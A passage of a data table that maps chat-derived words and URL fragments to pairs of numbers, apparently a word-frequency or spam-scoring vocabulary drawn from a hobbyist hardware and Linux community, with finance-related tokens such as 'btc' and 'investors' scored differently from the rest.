[65535, 0], "paople": [65535, 0], "consensus": [65535, 0], "pages": [65535, 0], "coordination": [65535, 0], "propose": [65535, 0], "ppl": [20045, 45490], "cloud": [30700, 34835], "person's": [65535, 0], "stolen": [65535, 0], "bitcoins": [8393, 57142], "miners": [65535, 0], "heating": [65535, 0], "gas": [65535, 0], "overnight": [65535, 0], "sanity": [65535, 0], "forays": [65535, 0], "past": [33223, 32312], "plate": [65535, 0], "passwd": [65535, 0], "posted": [65535, 0], "erin": [65535, 0], "thonktle": [65535, 0], "techie": [65535, 0], "younger": [65535, 0], "oblivious": [65535, 0], "pwn": [65535, 0], "altwork": [65535, 0], "amg": [65535, 0], "coreutils": [65535, 0], "habits": [65535, 0], "earbuds": [65535, 0], "six": [65535, 0], "driving": [65535, 0], "pints": [65535, 0], "simpler": [65535, 0], "ideas": [65535, 0], "dad": [65535, 0], "bizarre": [65535, 0], "mix": [65535, 0], "ergonomic": [65535, 0], "kludgy": [65535, 0], "tokopedia": [65535, 0], "baseus": [65535, 0], "adaman": [65535, 0], "bank": [20045, 45490], "pd": [65535, 0], "biru": [65535, 0], "mah": [65535, 0], "multimeter": [65535, 0], "shouldn": [65535, 0], "fume": [65535, 0], "removal": [65535, 0], "weller": [65535, 0], "capacitor": [65535, 0], "plague": [65535, 0], "microcontroller": [65535, 0], "lxde": [65535, 0], "develop": [65535, 0], "lxqt": [65535, 0], "shake": [65535, 0], "loose": [65535, 0], "hall": [65535, 0], "effect": [65535, 0], "prob": [65535, 0], "ggcon": [65535, 0], "rebooting": [65535, 0], "stripfear": [65535, 0], "lg": [2616, 62919], "bake": [65535, 0], "ovened": [65535, 0], "components": [65535, 0], "powerpathing": [65535, 0], "diodes": [65535, 0], "illegally": [65535, 0], "needle": [65535, 0], "probe": [65535, 0], "zoom": [65535, 0], "enhance": [65535, 0], "extremely": [65535, 0], "pixelated": [65535, 0], "scrips": [65535, 0], "useless": [65535, 0], "painful": [65535, 0], "sway": [65535, 0], "here's": [65535, 0], "draft": [65535, 0], "monday": [65535, 0], "dispatched": [65535, 0], "scare": [65535, 0], "electricity": [65535, 0], "toghether": [65535, 0], "dismissed": [65535, 0], "stirred": [65535, 0], "resting": [65535, 0], "food": [65535, 0], "pinecubes": [65535, 0], "scenery": [65535, 0], "stream": [65535, 0], "angles": [65535, 0], "cammed": [65535, 0], "preliminary": [65535, 0], "crossreference": [65535, 0], "twinn": [65535, 0], "victims": [65535, 0], "yr": [20045, 45490], "nixpkgsmobile": [65535, 0], "nut": [65535, 0], "plugin": [65535, 0], "macbook": [65535, 0], "presentation": [65535, 0], "referred": [17602, 47933], "inquiring": [65535, 0], "samples": [65535, 0], "presented": [30700, 34835], "guesswork": [65535, 0], "bidirectional": [65535, 0], "con": [9820, 55715], "complaints": [37311, 28224], "relatively": [65535, 0], "procedure": [65535, 0], "leaded": [65535, 0], "lead": [65535, 0], "apc": [65535, 0], "apcupsd": [65535, 0], "downloaded": [65535, 0], "shinkamui": [65535, 0], "mega": [65535, 0], "nz": [65535, 0], "gwmrdb": [65535, 0], "drfqchvt": [65535, 0], "ozk": [65535, 0], "fadygmqdgshbyd": [65535, 0], "vcoub": [65535, 0], "neoydu": [65535, 0], "educated": [65535, 0], "uncle": [65535, 0], "dad's": [65535, 0], "equipment": [45076, 20459], "investigation": [65535, 0], "welders": [65535, 0], "tend": [65535, 0], "aaaaa": [65535, 0], "hang": [65535, 0], "sources": [51053, 14482], "burns": [65535, 0], "bother": [65535, 0], "screwdriver": [65535, 0], "river": [65535, 0], "react": [65535, 0], "winrar": [65535, 0], "unzip": [65535, 0], "extract": [65535, 0], "reactionary": [65535, 0], "measure": [65535, 0], "jpw": [65535, 0], "ebhtsks": [65535, 0], "frappy": [65535, 0], "grabbed": [65535, 0], "dtb": [65535, 0], "pulling": [65535, 0], "puzzle": [65535, 0], "realizes": [65535, 0], "nobody's": [65535, 0], "goes": [51053, 14482], "claims": [65535, 0], "califnordia": [65535, 0], "maditation": [65535, 0], "hudder": [65535, 0], "am\u00e9lia": [65535, 0], "cryptoidiots": [65535, 0], "yv": [65535, 0], "xwrgkzx": [65535, 0], "father": [65535, 0], "ate": [65535, 0], "yogurt": [65535, 0], "soup": [65535, 0], "worthdoingbadly": [65535, 0], "vowifi": [65535, 0], "sqadcm": [65535, 0], "dwem": [65535, 0], "listen": [37311, 28224], "yvgkfdoanra": [65535, 0], "aparently": [65535, 0], "she": [65535, 0], "utube": [65535, 0], "germany": [65535, 0], "panic": [65535, 0], "pentile": [65535, 0], "oled": [65535, 0], "magnetic": [65535, 0], "sell": [65535, 0], "brass": [65535, 0], "wool": [65535, 0], "cleaning": [65535, 0], "deseases": [65535, 0], "seller": [65535, 0], "accepting": [65535, 0], "lemme": [65535, 0], "overkill": [65535, 0], "tone": [65535, 0], "charged": [65535, 0], "fastboot": [65535, 0], "gonne": [65535, 0], "legally": [65535, 0], "professional": [41813, 23722], "vi": [65535, 0], "similarly": [65535, 0], "neglected": [65535, 0], "bump": [65535, 0], "respectively": [65535, 0], "informing": [65535, 0], "wireless": [65535, 0], "formal": [65535, 0], "shinything": [65535, 0], "tons": [65535, 0], "xlr": [65535, 0], "bothers": [65535, 0], "snapped": [65535, 0], "estate": [65535, 0], "holes": [65535, 0], "discovery": [65535, 0], "speak": [65535, 0], "markings": [65535, 0], "tweaked": [65535, 0], "lole": [65535, 0], "ge": [65535, 0], "armv": [65535, 0], "disaster": [65535, 0], "meet": [14881, 50654], "pixel": [65535, 0], "ipads": [65535, 0], "repeatedly": [65535, 0], "coredump": [65535, 0], "tiling": [65535, 0], "wms": [65535, 0], "natural": [65535, 0], "matches": [65535, 0], "report's": [65535, 0], "bisected": [65535, 0], "graphics": [65535, 0], "reset": [65535, 0], "hong": [65535, 0], "kong": [65535, 0], "costly": [65535, 0], "blindly": [65535, 0], "soo": [5845, 59690], "comparing": [65535, 0], "cpu's": [65535, 0], "soom": [65535, 0], "ft": [65535, 0], "rl": [65535, 0], "zeros": [65535, 0], "bills": [65535, 0], "luckily": [20045, 45490], "currency": [9820, 55715], "humane": [65535, 0], "dude": [65535, 0], "rich": [23277, 42258], "eveery": [65535, 0], "compromised": [11832, 53703], "year's": [65535, 0], "ronwhocares": [65535, 0], "calm": [65535, 0], "pure": [65535, 0], "monitors": [65535, 0], "demand": [65535, 0], "microcenter": [65535, 0], "distance": [65535, 0], "ll": [65535, 0], "united": [20045, 45490], "kingdom": [20045, 45490], "heater": [65535, 0], "hydrogen": [65535, 0], "soldering": [65535, 0], "cell": [33223, 32312], "xiaomi": [65535, 0], "schau": [65535, 0], "dir": [65535, 0], "golden": [8393, 57142], "lightning": [65535, 0], "auf": [65535, 0], "hcpwdbcxsrg": [65535, 0], "audiophile": [65535, 0], "grade": [65535, 0], "wlvh": [65535, 0], "causing": [65535, 0], "damahe": [65535, 0], "handwire": [65535, 0], "macropad": [65535, 0], "cooler": [65535, 0], "precise": [65535, 0], "lora": [65535, 0], "regard": [65535, 0], "moldavia": [65535, 0], "cheating": [65535, 0], "reference": [65535, 0], "tonberries": [65535, 0], "biased": [65535, 0], "forst": [65535, 0], "matt": [65535, 0], "adopter": [65535, 0], "growing": [11832, 53703], "pains": [65535, 0], "amirite": [65535, 0], "harmed": [65535, 0], "row": [65535, 0], "stiffer": [65535, 0], "fill": [65535, 0], "outer": [65535, 0], "uv": [65535, 0], "cured": [65535, 0], "resin": [65535, 0], "nozzle": [65535, 0], "thicker": [65535, 0], "paper": [65535, 0], "disassembled": [65535, 0], "marc": [65535, 0], "openbsd": [65535, 0], "uirhcc": [65535, 0], "cbi": [65535, 0], "fgrik": [65535, 0], "hdkq": [65535, 0], "lh": [65535, 0], "googleusercontent": [65535, 0], "vri": [65535, 0], "oxqv": [65535, 0], "omfvlnyl": [65535, 0], "agzxuka": [65535, 0], "ecdnss": [65535, 0], "iugaxdfs": [65535, 0], "quabemrrye": [65535, 0], "tmyp": [65535, 0], "gmz": [65535, 0], "gv": [11832, 53703], "lgxino": [65535, 0], "vwocu": [65535, 0], "xrbyh": [65535, 0], "vmydk": [65535, 0], "ubnnolm": [65535, 0], "ciydyksfxeh": [65535, 0], "vujh": [65535, 0], "hymfulijchl": [65535, 0], "irpvh": [65535, 0], "bx": [65535, 0], "mprsuz": [65535, 0], "ksla": [65535, 0], "dpgwoygic": [65535, 0], "ooau": [65535, 0], "wznf": [65535, 0], "zwelttp": [65535, 0], "sfkfftzywpthzgwd": [65535, 0], "amlhq": [65535, 0], "iumzt": [65535, 0], "ysjo": [65535, 0], "rqu": [65535, 0], "ua": [16279, 49256], "plqyy": [65535, 0], "zrcxzmjgomx": [65535, 0], "ibb": [65535, 0], "gye": [65535, 0], "plpiybdjygzuv": [65535, 0], "bkcs": [65535, 0], "pvmv": [65535, 0], "rv": [65535, 0], "ktkxfnckvx": [65535, 0], "trg": [65535, 0], "ska": [65535, 0], "yvs": [65535, 0], "xohxw": [65535, 0], "safcmeikp": [65535, 0], "ttwhmmwszyl": [65535, 0], "ny": [65535, 0], "dyootmakmip": [65535, 0], "rcrsfwas": [65535, 0], "rnwof": [65535, 0], "ks": [65535, 0], "qsn": [65535, 0], "basw": [65535, 0], "qad": [65535, 0], "pegzznnykplf": [65535, 0], "ng": [65535, 0], "lokxj": [65535, 0], "immgraice": [65535, 0], "qlalkxevzkema": [65535, 0], "gy": [6503, 59032], "leepvpr": [65535, 0], "giz": [65535, 0], "qowy": [65535, 0], "wyofdyiawv": [65535, 0], "ytxw": [65535, 0], "stbpvi": [65535, 0], "rh": [65535, 0], "chtvsrsftqsidotgsfhqb": [65535, 0], "sjanojeolpcbolcg": [65535, 0], "stt": [65535, 0], "asca": [65535, 0], "sultk": [65535, 0], "hl": [65535, 0], "fyc": [65535, 0], "yh": [65535, 0], "hjbr": [65535, 0], "lgvorxgpyvvnat": [65535, 0], "feyp": [65535, 0], "fychlqvsbin": [65535, 0], "mluvxltnvla": [65535, 0], "zrxertfwz": [65535, 0], "jprybtzs": [65535, 0], "uo": [65535, 0], "ymrfrvlaxxikikkz": [65535, 0], "ifpqimuzzcpb": [65535, 0], "authuser": [65535, 0], "mmqtqouuzbikqp": [65535, 0], "iwgcski": [65535, 0], "uohnmagw": [65535, 0], "enlybbyeyf": [65535, 0], "tie": [65535, 0], "ldfvkniqzhkpx": [65535, 0], "fjimamlexwsxqu": [65535, 0], "bfwgqpxo": [65535, 0], "vvabudd": [65535, 0], "jge": [65535, 0], "bmzol": [65535, 0], "spge": [65535, 0], "vxhuzifn": [65535, 0], "fxdpz": [65535, 0], "hrnp": [65535, 0], "rapezi": [65535, 0], "lmzntmzz": [65535, 0], "yl": [65535, 0], "xpuccecwzediyl": [65535, 0], "szukqkzh": [65535, 0], "rczcogpxdde": [65535, 0], "eyxzj": [65535, 0], "xaoinwswnxx": [65535, 0], "vxk": [65535, 0], "qgrtg": [65535, 0], "nhjrpke": [65535, 0], "ppm": [65535, 0], "yf": [65535, 0], "kuof": [65535, 0], "jxyfcjsbhtvyitlkqc": [65535, 0], "okbvwwlvhnwszdatppm": [65535, 0], "wvcgnvcmcjqxl": [65535, 0], "ilkucps": [65535, 0], "ddwgz": [65535, 0], "aesxxdqxfh": [65535, 0], "xxz": [65535, 0], "vh": [65535, 0], "plbolvt": [65535, 0], "cjbbieockxt": [65535, 0], "nveyqzrin": [65535, 0], "uay": [65535, 0], "vkitxocd": [65535, 0], "vmisnclbob": [65535, 0], "yxk": [65535, 0], "zwmza": [65535, 0], "bdxymgaeumzi": [65535, 0], "ajozkzoz": [65535, 0], "pjyh": [65535, 0], "tnhmx": [65535, 0], "hfaj": [65535, 0], "venawldliqiguzcy": [65535, 0], "sg": [65535, 0], "zyzkc": [65535, 0], "kerakrpkco": [65535, 0], "ajiigxateyqurtpbe": [65535, 0], "huya": [65535, 0], "emqgi": [65535, 0], "uxadfiwepqqrxve": [65535, 0], "hmrut": [65535, 0], "gqez": [65535, 0], "bkah": [65535, 0], "vg": [65535, 0], "ziecswrahy": [65535, 0], "cxax": [65535, 0], "stsvnufh": [65535, 0], "jovu": [65535, 0], "cdpntqgxneafc": [65535, 0], "cghqmvbawizvdg": [65535, 0], "vxvazufgox": [65535, 0], "spjc": [65535, 0], "xvfzi": [65535, 0], "yedczcdrvhl": [65535, 0], "rhkbqzpswigpn": [65535, 0], "eyczigqe": [65535, 0], "jp": [20045, 45490], "fp": [65535, 0], "phiye": [65535, 0], "pogo": [65535, 0], "insert": [65535, 0], "yixijvr": [65535, 0], "responds": [65535, 0], "levinboot": [65535, 0], "average": [65535, 0], "mass": [9820, 55715], "circles": [65535, 0], "dailying": [65535, 0], "pricepoint": [65535, 0], "considered": [65535, 0], "pound": [65535, 0], "foolish": [65535, 0], "convinced": [20045, 45490], "tuesday": [65535, 0], "shedload": [65535, 0], "node": [65535, 0], "handwriting": [65535, 0], "irrenhaus's": [65535, 0], "forge": [65535, 0], "signature": [65535, 0], "suffered": [65535, 0], "esd": [65535, 0], "backed": [65535, 0], "helium": [65535, 0], "tokens": [20045, 45490], "bulls": [65535, 0], "dashboard": [30700, 34835], "escape": [65535, 0], "breakfast": [65535, 0], "study": [37311, 28224], "maths": [65535, 0], "worst": [65535, 0], "shines": [65535, 0], "diffuses": [65535, 0], "superior": [65535, 0], "pyrydcwuzzi": [65535, 0], "aside": [45076, 20459], "torn": [65535, 0], "membrane": [65535, 0], "factory": [65535, 0], "appreciation": [15449, 50086], "submodules": [65535, 0], "reported": [65535, 0], "kamlkadze": [65535, 0], "reconnecting": [65535, 0], "stateful": [65535, 0], "decoders": [65535, 0], "mungfusensei": [65535, 0], "ilya": [65535, 0], "suspiciously": [65535, 0], "hs": [65535, 0], "difficult": [41813, 23722], "translate": [65535, 0], "sometime": [65535, 0], "chroot": [65535, 0], "yall": [65535, 0], "nerds": [65535, 0], "dd'd": [65535, 0], "correctly": [65535, 0], "telling": [41813, 23722], "select": [65535, 0], "dreemurrs": [65535, 0], "nouboot": [65535, 0], "masochist": [65535, 0], "tpe": [65535, 0], "heated": [65535, 0], "molded": [65535, 0], "coordinate": [65535, 0], "partly": [65535, 0], "packing": [65535, 0], "known": [65535, 0], "must've": [65535, 0], "anomaly": [65535, 0], "solid": [65535, 0], "hq": [65535, 0], "theyre": [65535, 0], "vbat": [65535, 0], "resistance": [65535, 0], "compaq": [65535, 0], "geforce": [65535, 0], "se": [30700, 34835], "igpu": [65535, 0], "passmark": [65535, 0], "slightly": [65535, 0], "overclocked": [65535, 0], "thinks": [65535, 0], "filled": [65535, 0], "guaranteed": [9820, 55715], "afaiu": [65535, 0], "reaction": [65535, 0], "desoldered": [65535, 0], "psu": [65535, 0], "wasted": [65535, 0], "transformer": [65535, 0], "speedrunning": [65535, 0], "banking": [65535, 0], "regulations": [65535, 0], "theres": [65535, 0], "okd": [65535, 0], "lim": [65535, 0], "failure": [20045, 45490], "contacting": [65535, 0], "cypress": [65535, 0], "clavijo": [65535, 0], "razor": [65535, 0], "capacity": [65535, 0], "bigger": [65535, 0], "bum": [65535, 0], "interetsing": [65535, 0], "profile": [65535, 0], "ironos": [65535, 0], "swmo": [65535, 0], "texts": [65535, 0], "messaging": [65535, 0], "rowdyragamuffin": [65535, 0], "alloys": [65535, 0], "stannol": [65535, 0], "plugs": [65535, 0], "fsfreeze": [65535, 0], "blew": [65535, 0], "follow": [7328, 58207], "reminding": [65535, 0], "crashes": [65535, 0], "devastating": [65535, 0], "batch": [10411, 55124], "manufactured": [65535, 0], "bootcon": [65535, 0], "universal": [65535, 0], "tru": [65535, 0], "awg": [65535, 0], "pollin": [65535, 0], "hohlstecker": [65535, 0], "water": [45076, 20459], "damage": [65535, 0], "shortly": [65535, 0], "pasted": [65535, 0], "patches": [65535, 0], "nokaslr": [65535, 0], "averages": [65535, 0], "vscodium": [65535, 0], "phoc": [65535, 0], "ini": [65535, 0], "wildly": [65535, 0], "varying": [65535, 0], "behaviours": [65535, 0], "debugging": [65535, 0], "shallow": [65535, 0], "painstakingly": [65535, 0], "trough": [65535, 0], "fatih": [65535, 0], "budget": [65535, 0], "discrods": [815, 64720], "vebvbmfbecvcw": [815, 64720], "facebook": [65535, 0], "bdju": [65535, 0], "angry": [65535, 0], "fields": [65535, 0], "separated": [65535, 0], "colons": [65535, 0], "quake": [65535, 0], "genuinely": [26080, 39455], "gifted": [65535, 0], "rbetzen": [65535, 0], "threaded": [65535, 0], "primer": [65535, 0], "regex": [65535, 0], "mentions": [65535, 0], "cil": [65535, 0], "detected": [65535, 0], "jiffies": [65535, 0], "imc": [65535, 0], "cortex's": [65535, 0], "lamy": [65535, 0], "emr": [65535, 0], "pen": [65535, 0], "brains": [65535, 0], "tablet": [65535, 0], "tiptrans": [65535, 0], "faq": [65535, 0], "hotplate": [65535, 0], "nkwqyyv": [65535, 0], "jvqssoye": [65535, 0], "klrw": [65535, 0], "ewgdqzg": [65535, 0], "according": [30700, 34835], "visible": [65535, 0], "swoj\u0105": [65535, 0], "drog\u0105": [65535, 0], "przepisowa": [65535, 0], "jazda": [65535, 0], "na": [20045, 45490], "rondzie": [65535, 0], "scanning": [65535, 0], "rarely": [65535, 0], "dpaste": [65535, 0], "fbqzlme": [65535, 0], "halves": [65535, 0], "preposterous": [65535, 0], "sticking": [65535, 0], "acorns": [65535, 0], "motor": [65535, 0], "attach": [65535, 0], "paintball": [65535, 0], "gun": [65535, 0], "tends": [65535, 0], "blow": [65535, 0], "eardrums": [65535, 0], "shoot": [65535, 0], "squirrels": [65535, 0], "respect": [8393, 57142], "middle": [65535, 0], "clicked": [65535, 0], "loudly": [65535, 0], "remids": [65535, 0], "rebar": [65535, 0], "crossbow": [65535, 0], "shim": [65535, 0], "mbit": [65535, 0], "duplex": [65535, 0], "xdf": [65535, 0], "afd": [65535, 0], "soedge": [65535, 0], "talented": [65535, 0], "hk": [65535, 0], "privileges": [65535, 0], "agrement": [65535, 0], "clearing": [65535, 0], "m\u00f3vil": [65535, 0], "para": [5308, 60227], "los": [6503, 59032], "entusiastas": [65535, 0], "sus": [20045, 45490], "interruptores": [65535, 0], "privacidad": [20045, 45490], "son": [6503, 59032], "genialidad": [65535, 0], "xataka": [65535, 0], "moviles": [65535, 0], "movil": [65535, 0], "dozen": [65535, 0], "irl": [65535, 0], "convince": [65535, 0], "compiler": [65535, 0], "inefficient": [65535, 0], "where'd": [65535, 0], "cord": [65535, 0], "btc": [1052, 64483], "byte": [65535, 0], "transfer": [65535, 0], "transmission": [65535, 0], "reseating": [65535, 0], "depressed": [65535, 0], "admittedly": [65535, 0], "restarts": [65535, 0], "degrees": [65535, 0], "dealing": [65535, 0], "emmcs": [65535, 0], "robust": [65535, 0], "unkind": [65535, 0], "theverge": [65535, 0], "bose": [65535, 0], "augmented": [65535, 0], "frames": [65535, 0], "glasses": [65535, 0], "acrylic": [65535, 0], "warm": [65535, 0], "knife": [65535, 0], "butter": [65535, 0], "frank": [8393, 57142], "wire": [65535, 0], "hairdryers": [65535, 0], "blend": [65535, 0], "blendy": [65535, 0], "doind": [65535, 0], "exploded": [65535, 0], "animation": [65535, 0], "foil": [65535, 0], "backing": [65535, 0], "pikateehee": [65535, 0], "easily": [37311, 28224], "servers": [65535, 0], "nicer": [65535, 0], "flexible": [65535, 0], "netherlands": [65535, 0], "hackerspace": [65535, 0], "kit": [65535, 0], "spell": [65535, 0], "communist": [65535, 0], "commun": [65535, 0], "labelling": [65535, 0], "loading": [65535, 0], "edid": [65535, 0], "extension": [65535, 0], "celluloid": [65535, 0], "mid": [65535, 0], "brexit": [65535, 0], "crippled": [65535, 0], "tnagorran": [65535, 0], "noes": [65535, 0], "swiping": [65535, 0], "notifications": [65535, 0], "successor": [65535, 0], "qyn": [65535, 0], "cczxymq": [65535, 0], "cue": [65535, 0], "sxmgxucm": [65535, 0], "drvvbus": [65535, 0], "jmb": [65535, 0], "asmedia": [65535, 0], "squinty": [65535, 0], "squint": [65535, 0], "adjustable": [65535, 0], "accustrike": [65535, 0], "calculated": [65535, 0], "operational": [65535, 0], "dance": [65535, 0], "pico": [65535, 0], "wouldn": [65535, 0], "xpmsw": [65535, 0], "generated": [20045, 45490], "bigass": [65535, 0], "diode": [65535, 0], "apitrace": [65535, 0], "tabpad": [65535, 0], "xwayland": [65535, 0], "whatishl": [65535, 0], "ytmnd": [65535, 0], "chunky": [65535, 0], "knob": [65535, 0], "college": [65535, 0], "pressed": [65535, 0], "enter": [65535, 0], "rectangle": [65535, 0], "improvements": [65535, 0], "invest": [1250, 64285], "aud": [20045, 45490], "prince": [65535, 0], "charrming": [65535, 0], "praying": [65535, 0], "dec": [65535, 0], "teamup": [65535, 0], "investors": [2321, 63214], "shut": [65535, 0], "rr": [11832, 53703], "bounty": [65535, 0], "clack": [65535, 0], "beep": [65535, 0], "num": [65535, 0], "clearer": [65535, 0], "configuration": [65535, 0], "whatnot": [65535, 0], "kanolta": [65535, 0], "isp": [65535, 0], "ftth": [65535, 0], "ripoff": [65535, 0], "questionable": [65535, 0], "rot": [65535, 0], "apple": [65535, 0], "demoting": [65535, 0], "warning": [65535, 0], "toggling": [65535, 0], "vexed": [65535, 0], "wash": [65535, 0], "buzzing": [65535, 0], "hurr": [65535, 0], "swich": [65535, 0], "relays": [65535, 0], "contactorss": [65535, 0], "stations": [65535, 0], "circuit": [65535, 0], "pt": [65535, 0], "fqgbmy": [65535, 0], "neutral": [65535, 0], "modern": [65535, 0], "installations": [65535, 0], "foreigners": [65535, 0], "switched": [65535, 0], "outlets": [65535, 0], "trigger": [65535, 0], "pmic": [65535, 0], "modifying": [65535, 0], "tf": [65535, 0], "featuring": [65535, 0], "fingerprint": [65535, 0], "messaged": [65535, 0], "continuously": [11832, 53703], "compelled": [65535, 0], "obey": [65535, 0], "recompile": [65535, 0], "seg": [65535, 0], "pgwipeou": [65535, 0], "iec": [65535, 0], "meaningful": [65535, 0], "shock": [30700, 34835], "interference": [65535, 0], "flip": [65535, 0], "hava": [65535, 0], "refresh": [65535, 0], "virtualization": [65535, 0], "corticallabs": [65535, 0], "gooo": [65535, 0], "tilvids": [65535, 0], "caktbufsh": [65535, 0], "rbzj": [65535, 0], "swr": [65535, 0], "pinemicrowave": [65535, 0], "cluster": [65535, 0], "pofile": [65535, 0], "roblix": [65535, 0], "sam": [65535, 0], "shot": [65535, 0], "violated": [65535, 0], "nap": [65535, 0], "death": [65535, 0], "pinestream": [65535, 0], "rocketchat": [65535, 0], "compiling": [65535, 0], "analogue": [65535, 0], "struggled": [65535, 0], "haved": [65535, 0], "eventualy": [65535, 0], "corners": [65535, 0], "devkit": [65535, 0], "swd": [65535, 0], "lit": [65535, 0], "tar": [65535, 0], "bz": [65535, 0], "gd": [5308, 60227], "vf": [65535, 0], "continues": [65535, 0], "awful": [65535, 0], "java": [65535, 0], "resource": [65535, 0], "hog": [65535, 0], "fresh": [65535, 0], "corrupted": [65535, 0], "encrypting": [65535, 0], "likeley": [65535, 0], "bestofcpp": [65535, 0], "repo": [65535, 0], "kevinmkchin": [65535, 0], "truetypeassembler": [65535, 0], "combust": [65535, 0], "horrifying": [65535, 0], "aaand": [65535, 0], "boots": [65535, 0], "vov": [65535, 0], "armbianmonitor": [65535, 0], "shapeshifter's": [65535, 0], "mods": [65535, 0], "doom": [65535, 0], "skin": [65535, 0], "outputting": [65535, 0], "oflag": [65535, 0], "fear": [20045, 45490], "plating": [65535, 0], "corrosion": [65535, 0], "y'all": [65535, 0], "illiterate": [65535, 0], "triple": [65535, 0], "counter": [65535, 0], "thermocouple": [65535, 0], "positive": [20045, 45490], "leg": [65535, 0], "composed": [65535, 0], "nickel": [65535, 0], "negative": [20045, 45490], "aluminum": [65535, 0], "manganese": [65535, 0], "silicon": [65535, 0], "transformers": [65535, 0], "wound": [65535, 0], "naps": [65535, 0], "bicycle": [65535, 0], "beeper": [65535, 0], "practical": [65535, 0], "improvement": [65535, 0], "magnifying": [65535, 0], "lense": [65535, 0], "wear": [65535, 0], "tube": [65535, 0], "shotgun": [65535, 0], "freeing": [65535, 0], "uptown": [65535, 0], "thumb": [65535, 0], "swipe": [65535, 0], "qwerty": [65535, 0], "featured": [65535, 0], "mmu": [65535, 0], "pkgsrc": [65535, 0], "ilepo": [65535, 0], "alter": [65535, 0], "perspectives": [65535, 0], "scripts": [65535, 0], "honnest": [65535, 0], "exp\u00e9rimentations": [65535, 0], "render": [65535, 0], "urge": [65535, 0], "acceptable": [65535, 0], "opposed": [65535, 0], "urging": [65535, 0], "uncouth": [65535, 0], "devicetree": [65535, 0], "usbdrd": [65535, 0], "dwc": [65535, 0], "fcc": [65535, 0], "walkie": [65535, 0], "talkies": [65535, 0], "za": [30700, 34835], "gmrs": [65535, 0], "coresweb": [65535, 0], "publichome": [65535, 0], "frn": [65535, 0], "cents": [65535, 0], "deposited": [3881, 61654], "poison": [65535, 0], "hvac": [65535, 0], "systems": [65535, 0], "delicious": [65535, 0], "kebab": [65535, 0], "pencil": [65535, 0], "jank": [65535, 0], "attachment": [65535, 0], "relation": [65535, 0], "portugese": [65535, 0], "amazone": [65535, 0], "brasil": [65535, 0], "reviewers": [65535, 0], "idril": [65535, 0], "internetbanking": [65535, 0], "payment": [4161, 61374], "sufficient": [30700, 34835], "mmm": [65535, 0], "sake": [65535, 0], "mountain": [65535, 0], "dew": [65535, 0], "additionally": [65535, 0], "pushbikes": [65535, 0], "vulnerable": [65535, 0], "lowsiders": [65535, 0], "mnt": [65535, 0], "sysroot": [65535, 0], "stinks": [65535, 0], "consume": [65535, 0], "cork": [65535, 0], "wine": [65535, 0], "excerpt": [65535, 0], "margins": [65535, 0], "temps": [65535, 0], "sysfs": [65535, 0], "therefore": [65535, 0], "mcu": [65535, 0], "podcast": [65535, 0], "misspelled": [65535, 0], "jolla": [65535, 0], "stopped": [65535, 0], "cryptos": [65535, 0], "firestarter": [65535, 0], "justice": [65535, 0], "hotkey": [65535, 0], "learning": [65535, 0], "racda": [65535, 0], "firefly": [65535, 0], "gamma": [65535, 0], "apart": [65535, 0], "webkitgtk": [65535, 0], "degree": [65535, 0], "killing": [65535, 0], "dreams": [41813, 23722], "dsmic": [65535, 0], "doas": [65535, 0], "comfortabke": [65535, 0], "blocking": [65535, 0], "mouth": [65535, 0], "boost": [14881, 50654], "ends": [41813, 23722], "greatest": [20045, 45490], "shoddy": [65535, 0], "imgine": [65535, 0], "silicone": [65535, 0], "printhead": [65535, 0], "urcs": [65535, 0], "tcp": [65535, 0], "activity": [65535, 0], "fwyta": [65535, 0], "mw": [11832, 53703], "routed": [65535, 0], "modemmanager": [65535, 0], "grab": [41813, 23722], "chocolate": [65535, 0], "drink": [65535, 0], "skint": [65535, 0], "kabouik": [65535, 0], "lemur": [65535, 0], "vps": [65535, 0], "vultr": [65535, 0], "pf": [65535, 0], "sfos": [65535, 0], "eithet": [65535, 0], "showing": [65535, 0], "dell": [65535, 0], "dockingstation": [65535, 0], "episode": [65535, 0], "listened": [65535, 0], "interresting": [65535, 0], "zorg": [65535, 0], "ocv": [65535, 0], "shift": [65535, 0], "pfft": [65535, 0], "pmelse": [65535, 0], "overseen": [65535, 0], "dragonchaser": [65535, 0], "lunar": [65535, 0], "vietnam": [65535, 0], "holiday": [65535, 0], "argg": [65535, 0], "landline": [65535, 0], "gdb": [65535, 0], "nuclei": [65535, 0], "ultimately": [65535, 0], "heiko's": [65535, 0], "gentoo": [65535, 0], "schematics": [65535, 0], "cells": [65535, 0], "voodoo": [65535, 0], "compelling": [65535, 0], "vigilant": [65535, 0], "prying": [65535, 0], "art": [65535, 0], "volt": [6503, 59032], "amps": [65535, 0], "influence": [65535, 0], "sdore": [65535, 0], "zschroeder": [65535, 0], "jussihi": [65535, 0], "'at": [65535, 0], "cgsn'": [65535, 0], "yehoshua": [65535, 0], "ypw": [65535, 0], "il": [65535, 0], "transliteration": [65535, 0], "completeness": [65535, 0], "mpreditor": [65535, 0], "certified": [65535, 0], "cyber": [20045, 45490], "disappointed": [65535, 0], "perceived": [65535, 0], "un": [3881, 61654], "clarity": [65535, 0], "luddite": [65535, 0], "ctl": [65535, 0], "trick": [30700, 34835], "cleaner": [65535, 0], "tinner": [65535, 0], "thermaltronics": [65535, 0], "fba": [65535, 0], "tmt": [65535, 0], "tc": [65535, 0], "ns": [37311, 28224], "zg": [4484, 61051], "mtrx": [65535, 0], "grrrrr": [65535, 0], "somebody": [65535, 0], "mucky": [65535, 0], "haveibeenpwned": [65535, 0], "whatsup": [65535, 0], "yourupdate": [65535, 0], "chrisbradleydev": [65535, 0], "username": [20045, 45490], "adjust": [65535, 0], "anonymoushindeiru": [65535, 0], "partner": [41813, 23722], "integration": [65535, 0], "odm": [65535, 0], "incorrect": [65535, 0], "atf": [65535, 0], "trustzone": [65535, 0], "gwrgyumlvi": [65535, 0], "skid": [65535, 0], "fellets": [65535, 0], "bfygmnvzcyo": [65535, 0], "symptoms": [65535, 0], "defect": [65535, 0], "urself": [65535, 0], "starbucks": [65535, 0], "pointieststick": [65535, 0], "goop": [65535, 0], "caulk": [65535, 0], "hotsnot": [65535, 0], "consistencies": [65535, 0], "bcccfi": [65535, 0], "hoow": [65535, 0], "ocixqeyyy": [65535, 0], "shields": [65535, 0], "conduct": [65535, 0], "each": [37311, 28224], "oijnhp": [65535, 0], "wyhg": [65535, 0], "dotexe": [65535, 0], "bredbandskollen": [65535, 0], "manufacturer": [65535, 0], "investments": [3881, 61654], "comply": [65535, 0], "fate": [30700, 34835], "bigget": [65535, 0], "eol": [65535, 0], "prone": [65535, 0], "newegg": [65535, 0], "jus": [65535, 0], "tmake": [65535, 0], "investigated": [65535, 0], "dropped": [65535, 0], "succeed": [65535, 0], "vs": [45076, 20459], "layers": [65535, 0], "sliding": [65535, 0], "eachother": [65535, 0], "emark": 